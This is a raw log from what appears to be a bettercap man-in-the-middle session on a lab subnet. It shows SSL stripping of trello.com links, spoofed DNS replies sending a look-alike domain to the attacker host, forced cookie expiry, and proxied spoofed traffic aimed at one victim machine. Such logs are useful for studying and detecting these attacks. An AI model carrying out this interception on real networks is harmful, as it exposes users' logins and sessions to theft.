 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/67806f9ff1ce059372fafdc52c3073c2/jquery.min.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/6cdbcb3dcf82bba860f1768d184161ee/atlassian-logo-gray-small...
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/3a15a346421a08419648c0ca2f5e98b2/caret.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/e4e8fa01ba058bce8e9f2bb7459516f9/atlassian-logo-white-smal...
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:05.057610297 +0200 CEST m=+32.041720384 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/e4e8fa01ba058bce8e9f2bb7459516f9/atlassian-logo-white-small.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:05.119311102 +0200 CEST m=+32.103421192 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/3a15a346421a08419648c0ca2f5e98b2/caret.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:05.140594817 +0200 CEST m=+32.124704948 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:05.193034062 +0200 CEST m=+32.177144202 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/cb9154106eaefccc2847ad9c47d721ad/tracking.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/cb9154106eaefccc2847ad9c47d721ad/tracking.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35382
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35368
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:05.265525074 +0200 CEST m=+32.249635177 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/6be2cb0479cad2595799e4975a53a902/patternLibrary.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:05.294697618 +0200 CEST m=+32.278807745 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/6be2cb0479cad2595799e4975a53a902/patternLibrary.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35368
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:05.356131812 +0200 CEST m=+32.340241924 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/6be2cb0479cad2595799e4975a53a902/patternLibrary.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:05.444793449 +0200 CEST m=+32.428903575 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/cb9154106eaefccc2847ad9c47d721ad/tracking.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/cb9154106eaefccc2847ad9c47d721ad/tracking.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/6be2cb0479cad2595799e4975a53a902/patternLibrary.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/6be2cb0479cad2595799e4975a53a902/patternLibrary.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:05] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:10] [sys.log] [inf] [sslstrip] Sending expired cookies for trello.com to 12.0.0.5:49048
 12.0.0.0/24 > 12.0.0.4  » [08:13:10] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:10.636828105 +0200 CEST m=+37.620938223 {12.0.0.5 GET trello.com /login 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:10] [sys.log] [inf] dns.spoof sending spoofed DNS reply for trello.corn (->12.0.0.4) to 12.0.0.5 : 08:00:27:9d:69:22 (PCS Computer Systems GmbH).
 12.0.0.0/24 > 12.0.0.4  » [08:13:10] [sys.log] [inf] dns.spoof sending spoofed DNS reply for trello.corn (->12.0.0.4) to 12.0.0.5 : 08:00:27:9d:69:22 (PCS Computer Systems GmbH).
 12.0.0.0/24 > 12.0.0.4  » [08:13:10] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:10.682183627 +0200 CEST m=+37.666293739 {12.0.0.5 GET trello.com / 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:10] [sys.log] [inf] [sslstrip] Stripping 7 SSL links from trello.com
 12.0.0.0/24 > 12.0.0.4  » [08:13:10] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:10.959388156 +0200 CEST m=+37.943498276 { GET trello.com / 204251}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [net.sniff.http.request] http 12.0.0.5 GET trello.com/login
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [net.sniff.http.response] http 23.78.60.220:80 302 Found -> 12.0.0.5 (0 B text/plain)

 HTTP/1.1 302 Found
 Content-Type: text/plain
 Content-Type: text/plain
 Location: http://trello.corn/
 Pragma: no-cache
 Access-Control-Allow-Methods: *
 Date: Mon, 22 Apr 2019 06:13:10 GMT
 Content-Length: 0
 Allow-Access-From-Same-Origin: *
 Cache-Control: no-cache, no-store, must-revalidate
 Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src *; style-src * 'unsafe-inline';
 Set-Cookie: lang=EXPIRED; path=/; domain=.; Expires=Mon, 01-Jan-1990 00:00:00 GMT
 Set-Cookie: lang=EXPIRED; path=/; domain=; Expires=Mon, 01-Jan-1990 00:00:00 GMT
 Set-Cookie: mab=EXPIRED; path=/; domain=.; Expires=Mon, 01-Jan-1990 00:00:00 GMT
 Set-Cookie: mab=EXPIRED; path=/; domain=; Expires=Mon, 01-Jan-1990 00:00:00 GMT
 Set-Cookie: landing=EXPIRED; path=/; domain=.; Expires=Mon, 01-Jan-1990 00:00:00 GMT
 Set-Cookie: landing=EXPIRED; path=/; domain=; Expires=Mon, 01-Jan-1990 00:00:00 GMT
 Access-Control-Allow-Headers: *
 Access-Control-Allow-Origin: *
 Expires: Fri, 20 Apr 2018 04:20:00 GMT



 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : trello.corn is local
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : trello.corn is local
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : trello.corn is Non-Existent Domain
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : trello.corn is Non-Existent Domain
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [net.sniff.http.request] http 12.0.0.5 GET wwww.fonts.googleapis.com/css?family=Roboto
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35396
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35398
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35400
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35390
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:11.085997595 +0200 CEST m=+38.070107691 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [sys.log] [inf] [sslstrip] Replacing host wwww.fonts.googleapis.com with fonts.googleapis.com in request from 12.0.0.5:34818
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:11.091295532 +0200 CEST m=+38.075405634 {12.0.0.5 GET fonts.googleapis.com /css 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:11.10786546 +0200 CEST m=+38.091975571 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:11.111091007 +0200 CEST m=+38.095201125 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:11.114128912 +0200 CEST m=+38.098239051 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:11.173055463 +0200 CEST m=+38.157165588 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:11.183214688 +0200 CEST m=+38.167324800 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:11.226850937 +0200 CEST m=+38.210961033 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35400
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35398
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35396
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35394
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:11.277493339 +0200 CEST m=+38.261603467 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/6be2cb0479cad2595799e4975a53a902/patternLibrary.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:11.281226511 +0200 CEST m=+38.265336627 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/cb9154106eaefccc2847ad9c47d721ad/tracking.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:11.28609354 +0200 CEST m=+38.270203672 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:11.305207953 +0200 CEST m=+38.289318067 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/67806f9ff1ce059372fafdc52c3073c2/jquery.min.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:11.316069825 +0200 CEST m=+38.300179960 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:11.344268325 +0200 CEST m=+38.328378496 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/6be2cb0479cad2595799e4975a53a902/patternLibrary.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:11.360934989 +0200 CEST m=+38.345045211 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:11.42060536 +0200 CEST m=+38.404715485 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/67806f9ff1ce059372fafdc52c3073c2/jquery.min.js 45925}}
 [08:13:11] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/67806f9ff1ce059372fafdc52c3073c2/jquery.min.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/cb9154106eaefccc2847ad9c47d721ad/tracking.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/6be2cb0479cad2595799e4975a53a902/patternLibrary.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 [08:13:11] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:11.480003161 +0200 CEST m=+38.464113292 { GET fonts.googleapis.com /css 2221}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35402
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35390
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35394
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35398
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35396
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:11.49824551 +0200 CEST m=+38.482355643 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/6eaaf5e37ab67a8ed6cd7764660513b9/updated-layouts-sync.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:11.513421582 +0200 CEST m=+38.497531712 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/eebf313cb223112b503b7322173b013c/btn-appstore-black.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:11.524584242 +0200 CEST m=+38.508694379 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/308998dcb3ed5ab3d01217a4d24ffa03/hero-a.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:11.527901609 +0200 CEST m=+38.512011734 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/0cad30a99820b0d840a5b48635d00b6e/updated-layouts-collab.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:11.531296156 +0200 CEST m=+38.515406372 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/15e77c8347135120a438d17e38195e44/updated-layouts-platform.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:11.567613647 +0200 CEST m=+38.551723746 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/cb9154106eaefccc2847ad9c47d721ad/tracking.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:11.580823386 +0200 CEST m=+38.564933526 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/6eaaf5e37ab67a8ed6cd7764660513b9/updated-layouts-sync.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35400
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35396
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:11.650741733 +0200 CEST m=+38.634851869 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/308998dcb3ed5ab3d01217a4d24ffa03/hero-a.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35404
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:11.682216825 +0200 CEST m=+38.666326915 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:11.657423207 +0200 CEST m=+38.641533327 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/bcde9868a665af4ab4efe460c46fbc7b/btn-playstore-black.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35406
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:11.709752899 +0200 CEST m=+38.693863015 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/0cad30a99820b0d840a5b48635d00b6e/updated-layouts-collab.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:11.749716138 +0200 CEST m=+38.733826234 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/42feb2498e08d8fbd357e19d331da908/logo-adobe.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:11.745837447 +0200 CEST m=+38.729947535 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/eebf313cb223112b503b7322173b013c/btn-appstore-black.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:11.803390417 +0200 CEST m=+38.787500505 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/15e77c8347135120a438d17e38195e44/updated-layouts-platform.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35408
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:11.829014192 +0200 CEST m=+38.813124313 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/bcde9868a665af4ab4efe460c46fbc7b/btn-playstore-black.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:11.832501851 +0200 CEST m=+38.816611952 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/83b3c2b3542d1ce997306dd2c76a898d/logo-kickstarter.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:11.834955243 +0200 CEST m=+38.819065355 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/99b35981e7c571708532ba39f0764aeb/logo-national-geographic.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35410
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35412
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:11.914071179 +0200 CEST m=+38.898181281 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/42feb2498e08d8fbd357e19d331da908/logo-adobe.svg 5109}}
